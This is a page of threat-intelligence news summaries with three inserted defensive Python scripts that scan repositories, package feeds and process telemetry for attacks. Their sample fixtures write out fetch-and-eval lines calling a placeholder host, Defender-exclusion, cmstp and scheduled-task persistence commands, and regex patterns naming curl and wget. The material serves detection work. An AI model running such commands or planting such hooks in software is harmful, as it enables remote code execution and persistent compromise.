ciso brief

All news with #threat report tag

497 articles · page 8 of 25

Seven Key Factors Driving the Cybersecurity Skills Gap

🔐 The article summarizes seven factors limiting organizations' ability to build sustainable cybersecurity talent pipelines and cites World Economic Forum data showing only 14% of organizations feel they have the required people and skills. Contributors highlight constrained budgets and rising burnout, the rapid emergence of AI and other technologies, and misaligned employer–candidate expectations as core drivers. Additional issues include outdated processes, training mismatches, strategy disconnects, and failures to simplify and scale operations. Experts recommend internal upskilling, using managed services and automation, and framing the skills gap as a clear business risk to leadership.

Google Warns Iran Will Launch Global Cyber-Attacks

⚠ John Hultquist, chief analyst of Google’s Threat Intelligence Group, warned that Iran will "absolutely" respond to recent US and Israeli air strikes with cyber-attacks targeting a broad array of organisations across the Middle East and beyond. He said the focus will shift from well-defended states like Israel to nations with less mature security, expanding the global attack surface. Hultquist highlighted the blurred lines between state actors, criminal groups and hacktivist fronts, noting the likely use of ransomware and proxy operations by the IRGC to obfuscate attribution. The UK’s NCSC has advised organisations with Middle East ties to urgently review and strengthen their cybersecurity posture.

Hybrid Middle East Conflict Sparks Global Cyber Surge

🌐 The escalation in the Middle East has entered a hybrid phase combining military strikes with large-scale cyber operations following the joint Israeli–US strikes on Iran on 28 February 2026. CloudSEK reported a sweeping cyber campaign that reduced Iran's internet to roughly 4% of normal capacity, disrupting government services, media and parts of the energy and aviation sectors. Security firm Halcyon warns of rising DDoS, hacktivist and ransomware activity and urges organisations to increase monitoring, enforce multi-factor authentication and maintain offline backups against supply-chain and regional spillover risks.

Weekly Recap: SD-WAN 0-Day, Critical CVEs & Trends

⚡ The week's highlights show attackers exploiting critical infrastructure, cloud APIs, AI tooling, and consumer devices. A Cisco SD-WAN zero-day (CVE-2026-20127) is being actively exploited to gain administrative access, while a string of high-severity CVEs across vendors requires immediate attention. Misuse of trusted services — from Google Sheets and Gemini to autonomous AI agents — combined with exposed keys, is enabling stealthy, scalable access. Organizations should prioritize patching, tighten access to AI and cloud keys, and use continuous testing to validate defenses.

Ransomware revenues fall despite surge in victims globally

🔒 Chainalysis reports that total ransomware cryptocurrency payments fell 8% year-on-year to $820m in 2025, even as the number of victims surged 50% to make 2025 the most active year on record. Payment rates dropped from 63% in 2024 to 29% in 2025, while the median ransom rose 368% to $59,556. The firm attributes these shifts to improved incident response, global disruption of infrastructure and laundering networks, cryptographic flaws in strains like VolkLocker, and fragmentation of ransomware-as-a-service into numerous smaller groups.

Ransom Payments Fall as Incidents Rise, Chainalysis Finds

🔍 Chainalysis reports ransomware actors collected $820 million in 2025, a 28% decline from 2024 despite a roughly 50% rise in reported attacks year-over-year. Analysts attribute the drop to broader adherence to guidance discouraging ransom payments and to the legal risks associated with payouts. At the same time, the median ransom payment jumped 368% to nearly $60,000, suggesting that the victims who do pay are settling for much larger sums to prevent data resale or exposure.

Europol 'Project Compass' Leads to 30 Arrests in Europe

🔎 Europol-led Operation Compass has resulted in 30 arrests and linked 179 suspects to The Com, a decentralized cybercrime collective that targets children and teenagers. Launched in January 2025 and coordinated with law enforcement from 28 countries, the action identified 62 victims and directly safeguarded four. Investigators mapped multiple subgroups—Offline Com, Cyber Com, and (S)extortion Com—that facilitate violence, intrusions, and sexual exploitation.

How Google Addresses Critical Security Topics, 2026

🛡️ Royal Hansen, VP Engineering at Google, outlines how Google Cloud is confronting emergent cybersecurity risks as AI reshapes the threat landscape. He emphasizes AI-powered malware, supply-chain and training-data poisoning, and governance challenges tied to loss-of-control of AI infrastructure. Google is advancing controls—tamper-proof provenance, model-level protections, Identity and Access Management, and treating prompts like code—while rolling out agentic workflows to augment SOC teams. The post also consolidates recent threat intelligence, incident responses, and practitioner resources.

APT37 Ruby Jumper Campaign Expands Toolkit and USB Methods

🔎 APT37 has launched the 'Ruby Jumper' campaign using removable-media infection tools to compromise air-gapped systems, researchers at Zscaler ThreatLabz found. The actor abused malicious .LNK shortcuts to run a PowerShell stager that extracts multiple embedded payloads and deploys a new implant, Restleaf, which uses Zoho WorkDrive for C2. Additional undocumented tools—SnakeDropper, ThumbSBD, VirusTask and FootWine—enable in-memory execution, USB propagation and staged exfiltration.

ScarCruft Campaign Uses Zoho WorkDrive and USB Implants

🔒 In December 2025, Zscaler ThreatLabz exposed the Ruby Jumper campaign linking North Korea's ScarCruft to a novel multi-stage intrusion that abuses cloud storage and removable media. The attack begins with a malicious LNK that launches PowerShell to extract an embedded decoy document and multiple payloads, including the in-memory loader RESTLEAF. RESTLEAF uniquely leverages Zoho WorkDrive for C2 to fetch shellcode and stage follow-on components, while SNAKEDROPPER, THUMBSBD, and VIRUSTASK enable persistence, surveillance, and propagation to air-gapped systems via USB.

Trojanized Gaming Tools Spread Java RAT, Evade Detection

🎮 Microsoft Threat Intelligence warns that threat actors are distributing trojanized gaming utilities via browsers and chat platforms to deliver a Java-based remote access trojan (RAT). A malicious downloader stages a portable Java runtime and executes a jd-gui.jar, leveraging PowerShell and LOLBins like cmstp.exe for stealth and self-deletion while configuring Microsoft Defender exclusions. Persistence is achieved with a scheduled task and a startup script named world.vbs, and the final payload phones home to 79.110.49[.]15 for command-and-control.

Aeternum Botnet Shifts C2 to Polygon Blockchain Control

⛓️ A newly discovered loader named Aeternum relocates botnet command-and-control onto the Polygon blockchain, researchers at Qrator Research Lab report. Infected machines retrieve instructions written as on-chain transactions and poll more than 50 RPC endpoints instead of contacting centralized servers or domains. The seller offers native C++ builds and a web dashboard that writes commands to smart contracts, creating a low-cost, resilient C2 channel that complicates traditional takedowns and shifts defensive emphasis to edge filtering and proactive DDoS mitigation.

Darktrace: 32M High-Confidence Phishing Emails in 2025

📧 Darktrace detected more than 32 million high-confidence phishing emails in 2025, signaling a major escalation in identity-driven attacks and automated campaigns. Over 8.2 million of those targeted VIPs, while 1.6 million originated from newly created domains and 1.2 million included malicious QR codes. The vendor reported 70% of phishing passed DMARC, 41% were spear-phishing and 38% used novel social-engineering techniques, highlighting attackers’ growing sophistication and emphasis on credential compromise.

Ransomware Payment Rate Falls to Record Low in 2025

🔒 Chainalysis reports that the proportion of ransomware victims who paid extortionists fell to a record low of 28% in 2025, even as claimed attacks rose sharply. The blockchain intelligence firm says total on-chain ransomware receipts currently total $820 million and may approach or exceed $900 million as more events are attributed. While total payment counts remained relatively stable, the median ransom surged 368% to $59,556, and analysts flagged growing fragmentation and several high-impact breaches.

Ransomware Payments Fall to Record Low as Attacks Rise

🔒 Chainalysis reports the ransomware victim payment rate fell to 28% in 2025, an all-time low, even as claimed attacks rose about 50% year-over-year. On-chain ransomware receipts totaled $820 million so far and may approach $900 million, while the median ransom jumped to $59,556, up 368% from 2024. Analysts point to improved incident response, regulatory scrutiny, law enforcement actions, and market fragmentation. The report also notes 85 active extortion groups and that initial access brokers earned roughly $14 million in 2025.

Fake Next.js Repos Deliver In-Memory JS Backdoors Campaign

⚠️ A coordinated developer-targeting campaign uses fake Next.js repositories and job-assessment lures to trick engineers into executing attacker-controlled JavaScript at runtime. Microsoft and third-party researchers identified three execution paths — VS Code workspace tasks with runOptions.runOn set to "folderOpen", dev-server builds, and backend startup — that all fetch loaders from staging services such as Vercel. The in-memory payload profiles the host, polls for an instanceId and executes server-supplied code to maintain persistent C2 while leaving few artifacts on disk.
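The three execution paths in that summary can all be checked for in a cloned repository before anyone opens it in VS Code or runs the dev server. The script below is an added example by this editor, not tooling from Microsoft or the researchers: it parses .vscode/tasks.json for tasks with runOptions.runOn == "folderOpen", and greps package.json scripts and Next.js/Node startup files for fetch-and-eval patterns. The sample repository it writes to a temporary directory is constructed; the hostname placeholder-stage.vercel.app and the file names are placeholders, not indicators from the campaign.

```python
"""Check a cloned repo for code that runs on folder open or at build/startup.
Added example by the editor, not tooling from Microsoft or the researchers.
Covers the three paths named in the summary: VS Code tasks with
runOptions.runOn == "folderOpen", package.json scripts (dev-server build), and
Next.js/Node startup files that fetch and evaluate remote code."""
import json
import re
import tempfile
from pathlib import Path

# Commands that pull code off the network and run it. The vercel.app match is
# only there because the summary names Vercel as a staging host; this is a
# heuristic, not an indicator list.
REMOTE_EXEC = re.compile(
    r"(curl\s|wget\s|fetch\(|https?://[^\s'\"]+\.(?:vercel\.app|js)\b|node\s+-e\s|\beval\()",
    re.IGNORECASE,
)
STARTUP_FILES = ("next.config.js", "next.config.mjs", "next.config.ts",
                 "instrumentation.js", "instrumentation.ts", "server.js")


def strip_jsonc(text):
    """VS Code config is JSON with comments; drop /* */ and whole-line // ones."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.DOTALL)
    return re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)


def scan_vscode_tasks(repo):
    path = Path(repo) / ".vscode" / "tasks.json"
    if not path.is_file():
        return []
    findings = []
    for task in json.loads(strip_jsonc(path.read_text())).get("tasks", []):
        cmd = " ".join([str(task.get("command", ""))] +
                       [str(a) for a in task.get("args", [])])
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            findings.append(("auto-run on folder open", task.get("label"), cmd))
        elif REMOTE_EXEC.search(cmd):
            findings.append(("task fetches remote code", task.get("label"), cmd))
    return findings


def scan_package_json(repo):
    path = Path(repo) / "package.json"
    if not path.is_file():
        return []
    scripts = json.loads(path.read_text()).get("scripts", {})
    return [("npm script fetches remote code", name, cmd)
            for name, cmd in scripts.items() if REMOTE_EXEC.search(cmd)]


def scan_startup_files(repo):
    findings = []
    for fname in STARTUP_FILES:
        path = Path(repo) / fname
        if not path.is_file():
            continue
        for lineno, line in enumerate(path.read_text().splitlines(), 1):
            if REMOTE_EXEC.search(line):
                findings.append(("startup file fetches remote code",
                                 f"{fname}:{lineno}", line.strip()))
    return findings


def scan_repo(repo):
    """All findings as (reason, where, command-or-line) tuples."""
    return scan_vscode_tasks(repo) + scan_package_json(repo) + scan_startup_files(repo)


def build_sample_repo():
    """Constructed look-alike of a lure repo, written to a temp dir.
    Sample data for this example only; hostname and names are placeholders."""
    repo = Path(tempfile.mkdtemp())
    (repo / ".vscode").mkdir()
    (repo / ".vscode" / "tasks.json").write_text(json.dumps({
        "version": "2.0.0",
        "tasks": [
            {"label": "install deps", "type": "shell", "command": "npm install",
             "runOptions": {"runOn": "folderOpen"}},
            {"label": "lint", "type": "shell", "command": "npm run lint"},
        ],
    }))
    (repo / "package.json").write_text(json.dumps({
        "name": "assessment-app",
        "scripts": {
            "dev": "node -e \"fetch('https://placeholder-stage.vercel.app/l.js')"
                   ".then(r=>r.text()).then(eval)\" && next dev",
            "build": "next build",
        },
    }))
    (repo / "server.js").write_text(
        "const app = require('./app');\n"
        "fetch('https://placeholder-stage.vercel.app/init.js').then(r => r.text()).then(eval);\n"
        "app.listen(3000);\n")
    return repo


if __name__ == "__main__":
    for reason, where, detail in scan_repo(build_sample_repo()):
        print(f"[{reason}] {where}: {detail}")
```

On the constructed repo this reports the auto-run task, the "dev" script and server.js line 2. One caveat: VS Code gates automatic tasks behind Workspace Trust and the task.allowAutomaticTasks setting, so the folderOpen path depends on the engineer trusting the folder, whereas the dev-server and backend-startup paths run with no prompt at all once someone starts the project; the regex is a triage heuristic and will miss obfuscated fetches.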

Typosquatted NuGet Package Impersonates Stripe Library

⚠ A malicious NuGet package, StripeApi.Net, was uploaded on February 16, 2026 and impersonated Stripe.net by reusing the official icon, a near-identical README and inflated download counts across hundreds of versions. The package implemented legitimate payment functions but altered key methods to capture and exfiltrate Stripe API tokens while leaving payment processing appearing to work normally. ReversingLabs discovered and reported the package and it was removed from NuGet before wide impact.
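The impersonation pattern described there (a brand name plus a generic suffix, a different publisher) is simple to screen for in a dependency feed. The snippet below is an added example by this editor, not ReversingLabs' tooling: it normalises package IDs, peels generic suffixes such as .Net and Api so that StripeApi.Net and Stripe.net collapse to the same token, and flags the name when the owner is not the trusted publisher. TRUSTED, the owner handles and the package feed are constructed for the example; the only name taken from the report is StripeApi.Net.

```python
"""Flag registry packages whose name rides on a trusted publisher's brand but
whose owner is someone else. Added example by the editor, not ReversingLabs'
tooling; TRUSTED and SAMPLE_FEED are constructed and the owner handles are
placeholders (on NuGet the real control is ID prefix reservation)."""
import re

# brand token -> publisher account that legitimately owns it, and its packages
TRUSTED = {
    "stripe": {"owner": "stripe", "packages": ["Stripe.net"]},
    "newtonsoft": {"owner": "jamesnk", "packages": ["Newtonsoft.Json"]},
}
GENERIC_SUFFIXES = ("dotnet", "net", "core", "client", "sdk", "api", "lib")


def normalize(name):
    """Lowercase, drop separators and peel generic suffixes so that
    'StripeApi.Net' -> 'stripe', exactly like 'Stripe.net' -> 'stripe'."""
    n = re.sub(r"[^a-z0-9]", "", name.lower())
    peeled = True
    while peeled:
        peeled = False
        for suffix in GENERIC_SUFFIXES:
            if n.endswith(suffix) and len(n) > len(suffix):
                n = n[:-len(suffix)]
                peeled = True
    return n


def levenshtein(a, b):
    """Plain edit distance; inputs are short so no library is needed."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess(package, owner):
    """Return a reason if `package` published by `owner` looks like an
    impersonation of a trusted package, else None."""
    norm = normalize(package)
    for brand, info in TRUSTED.items():
        if owner == info["owner"]:
            continue  # the real publisher may name its packages freely
        for legit in info["packages"]:
            if levenshtein(norm, normalize(legit)) <= 1:
                return (f"normalizes to within one edit of {legit}; owner is "
                        f"{owner}, not {info['owner']}")
        if brand in norm:
            return (f"carries the {brand} brand token but is published by "
                    f"{owner}, not {info['owner']} (review, do not block)")
    return None


# Constructed feed of (package id, owner). Only StripeApi.Net is a name from
# the report; its owner handle here is made up.
SAMPLE_FEED = [
    ("Stripe.net", "stripe"),
    ("StripeApi.Net", "stripe-dev"),
    ("Strlpe.net", "mallory"),
    ("Newtonsoft.Json", "jamesnk"),
    ("Serilog", "serilog"),
    ("MyShop.StripeWebhooks", "acme"),
]


def scan(feed=SAMPLE_FEED):
    """Map of flagged package id -> reason."""
    flagged = {}
    for pkg, owner in feed:
        reason = assess(pkg, owner)
        if reason:
            flagged[pkg] = reason
    return flagged


if __name__ == "__main__":
    for pkg, reason in scan().items():
        print(f"{pkg}: {reason}")
```

The two tiers matter in practice: a normalised name within one edit of a trusted package is close to a hard block, while a package that merely contains the brand token (a third-party Stripe webhook helper, say) is common and legitimate, so that tier is a review signal. Neither check replaces verifying the publisher and the repository link, which is what the icon and README copying in this case were designed to defeat.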

Steaelite RAT Unifies Data Theft and Ransomware Tools

⚠️ Steaelite is a browser-based remote access trojan marketed on underground forums that consolidates remote access, credential harvesting, data exfiltration, and a planned ransomware module into a single management pane. Researchers at BlackFog say the toolkit includes live screen streaming, webcam and microphone access, password recovery, Defender-disable capabilities, and persistence options, and it’s been available since last November. The seller offers access as malware-as-a-service (about $200/month), and defenders are urged to prioritize stopping data exfiltration over relying solely on perimeter defenses.

Unmasking Agent Tesla: Multi-Stage Campaign Analysis

🔍 This Fortinet analysis dissects a recent multi-stage campaign deploying Agent Tesla, which targets Windows users with credential theft and keylogging. The chain uses spearphishing with RAR attachments containing obfuscated JSE loaders that fetch encrypted PowerShell scripts and reflectively load .NET assemblies in memory. Operators leverage process hollowing, virtualization and sandbox checks, and SMTP-based exfiltration to minimize detection. Fortinet telemetry and cross-product protections are highlighted to help organizations mitigate the threat.
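The Agent Tesla chain here and the trojanized gaming-tool chain above share the same living-off-the-land shape: a script host launches a loader from a user-writable path, spawns PowerShell with a hidden window or encoded command, and from there adds Defender exclusions, abuses cmstp.exe, registers a scheduled task pointing at a Startup-folder script, or reflectively loads a .NET assembly. The rule set below is an added example by this editor, not Microsoft's or Fortinet's detection content, showing how those stages look as process-creation triage rules plus a parent-chain walk; SAMPLE_EVENTS is constructed telemetry, and the file names and the base64 blob are placeholders rather than indicators from either report.

```python
"""Rule-based triage of process-creation events for the LOLBin chains in the
two write-ups above: script-host loader -> hidden/encoded PowerShell ->
Defender exclusion, cmstp.exe, scheduled task into the Startup folder, and a
reflective .NET load. Added example by the editor, not Microsoft's or
Fortinet's detection content; SAMPLE_EVENTS is constructed telemetry and the
file names and base64 blob are placeholders."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
PS_HOSTS = {"powershell.exe", "pwsh.exe"}

USER_DIR_SCRIPT = re.compile(r"\\(?:Users|Temp)\\.*\.(?:jse|js|vbs|wsf|hta)\b", re.I)
PS_STEALTH = re.compile(
    r"(?:^|\s)-(?:nop\b|noprofile\b|w(?:indowstyle)?\s+hidden\b"
    r"|e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,})", re.I)
DEFENDER_TAMPER = re.compile(
    r"Add-MpPreference\s.*-Exclusion(?:Path|Process|Extension)|Set-MpPreference\s.*-Disable", re.I)
CMSTP_INF = re.compile(r"\s/(?:s|ni)\b.*\.inf\b", re.I)
TASK_STARTUP = re.compile(r"/create\b.*(?:\\Startup\\|\.(?:vbs|js|jse|ps1)\b)", re.I)
REFLECTIVE = re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load", re.I)


def basename(image):
    """'C:\\Windows\\System32\\wscript.exe' -> 'wscript.exe'."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# (rule name, predicate over the event and its parent event or None)
RULES = [
    ("script host running a script from a user-writable path",
     lambda e, p: basename(e["image"]) in SCRIPT_HOSTS and USER_DIR_SCRIPT.search(e["cmdline"])),
    ("PowerShell with hidden window, no profile or encoded command",
     lambda e, p: basename(e["image"]) in PS_HOSTS and PS_STEALTH.search(e["cmdline"])),
    ("PowerShell spawned by a script host",
     lambda e, p: basename(e["image"]) in PS_HOSTS and p is not None
     and basename(p["image"]) in SCRIPT_HOSTS),
    ("Defender exclusion added or feature disabled",
     lambda e, p: DEFENDER_TAMPER.search(e["cmdline"])),
    ("cmstp.exe executing an INF (LOLBin)",
     lambda e, p: basename(e["image"]) == "cmstp.exe" and CMSTP_INF.search(e["cmdline"])),
    ("scheduled task pointing at the Startup folder or a script file",
     lambda e, p: basename(e["image"]) == "schtasks.exe" and TASK_STARTUP.search(e["cmdline"])),
    ("reflective .NET assembly load from PowerShell",
     lambda e, p: basename(e["image"]) in PS_HOSTS and REFLECTIVE.search(e["cmdline"])),
]


def evaluate(events):
    """Return [(pid, rule name)] for every event/rule match."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        for name, pred in RULES:
            if pred(e, parent):
                hits.append((e["pid"], name))
    return hits


def ancestry(events, pid):
    """Process chain root -> pid as image basenames, so the analyst sees the
    whole stage sequence rather than isolated alerts."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"pid": 100, "ppid": 4, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "cmdline": r'"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\alice\Downloads\invoice.rar'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\alice\AppData\Local\Temp\stage1.jse"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA="},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -Command Add-MpPreference -ExclusionPath C:\Users\Public"},
    {"pid": 600, "ppid": 400, "image": r"C:\Windows\System32\cmstp.exe",
     "cmdline": r"cmstp.exe /ni /s C:\Users\Public\profile.inf"},
    {"pid": 700, "ppid": 400, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn Updater /sc onlogon /tr "wscript.exe C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\world.vbs"'},
    {"pid": 800, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},  # benign admin script
    {"pid": 900, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command $a=[System.Reflection.Assembly]::Load($bytes);$a.EntryPoint.Invoke($null,$null)"},
]

if __name__ == "__main__":
    for pid, rule in evaluate(SAMPLE_EVENTS):
        print(pid, rule, "<-", " > ".join(ancestry(SAMPLE_EVENTS, pid)))
```

On the constructed events the benign -File script produces no hit while the loader chain produces seven, and ancestry() ties them back to the archive tool and script host that started it. Command-line regexes are brittle against the obfuscation both reports describe (abbreviated switches, string splitting, encoded commands that never touch the command line), so treat these as triage rules to correlate along the parent chain, not as a substitute for script-block logging and AMSI telemetry.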

AI-enabled Cyber Attacks Nearly Double in 2025 - CrowdStrike

⚠️ CrowdStrike's Global Threat Report 2026 warns that AI-enabled cyber-attacks rose 89% in 2025 as adversaries used machine learning and LLMs to scale and refine phishing, disinformation and malware operations. Researchers observed LLMs producing convincing multilingual phishing lures and automating campaign creation, while some actors embedded prompting into malware (e.g., LameHug) for reconnaissance. CrowdStrike recommends strong identity controls, AI-focused awareness training and threat-intel monitoring to mitigate the accelerating threat.